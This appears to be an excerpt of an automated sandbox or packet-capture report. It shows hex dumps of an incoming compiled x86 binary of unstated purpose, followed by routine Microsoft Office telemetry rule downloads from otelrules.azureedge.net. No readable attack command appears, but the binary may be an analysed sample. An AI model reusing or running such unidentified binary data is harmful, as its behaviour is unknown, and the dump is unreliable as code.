2024-11-25 10:33:36 UTC	16384	IN	Data Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b Data Ascii: D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-11-25 10:33:36 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49759	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:37 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:37 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:37 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: fd91c27a-801e-0083-67e3-3ef0ae000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103337Z-15b8b599d88wn9hhhC1TEBry0g00000005t000000000eg9f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:37 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49760	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:37 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:38 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:37 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: eb55dd92-f01e-0020-3d6a-3c956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103337Z-174c587ffdf9xbcchC1TEBxkz400000005mg00000000eb4w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:38 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:37 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:38 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:37 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103337Z-178bfbc474bvjk8shC1NYC83ns000000077g000000003ed8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:38 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:37 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:38 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:38 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: a6b1c0e3-801e-002a-1ea2-3e31dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103338Z-178bfbc474bxkclvhC1NYC69g4000000076g000000009m96 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:38 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	49762	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:37 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:38 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:38 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 89d933d2-101e-0028-046e-3c8f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103338Z-174c587ffdf59vqchC1TEByk68000000060g000000004vrt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:38 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.5	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:39 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:39 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:39 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: af3fdc2c-601e-00ab-2e0c-3f66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103339Z-15b8b599d88n8stkhC1TEBb78n00000000s00000000025mu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-25 10:33:39 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:40 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:40 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 12647bc5-a01e-0070-6743-3d573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103340Z-178bfbc474bv7whqhC1NYC1fg400000007e00000000015z7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:40 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.5	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:40 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:40 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:40 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103340Z-174c587ffdf89smkhC1TEB697s00000005ug00000000dte2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:40 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	49766	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
